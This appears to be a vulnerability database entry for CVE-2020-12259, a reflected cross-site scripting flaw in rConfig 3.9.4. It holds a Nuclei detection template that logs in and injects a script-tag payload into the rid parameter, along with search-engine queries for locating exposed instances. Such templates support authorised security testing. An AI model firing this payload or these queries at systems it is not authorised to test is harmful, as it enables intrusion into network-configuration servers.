3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
7.1 High
AI Score
Confidence
High
0.163 Low
EPSS
Percentile
96.0%
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
id: CVE-2020-12259
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12259
cwe-id: CWE-79
epss-score: 0.16256
epss-percentile: 0.95985
cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 3
vendor: rconfig
product: rconfig
shodan-query:
- http.title:"rConfig"
- http.title:"rconfig"
fofa-query: title="rconfig"
google-query: intitle:"rconfig"
tags: cve2020,cve,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and
# digest: 4a0a004730450220319251ce99196aa9542616a92b335d92fe9ebb8e1cfc1510bda81df633d7bb100221009c547c64478219cf0f204f49ff70d1585dcaccbf8b14338aa22845f05a1e81d1:922c64590222798bb761d5b6d8e72950
3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
7.1 High
AI Score
Confidence
High
0.163 Low
EPSS
Percentile
96.0%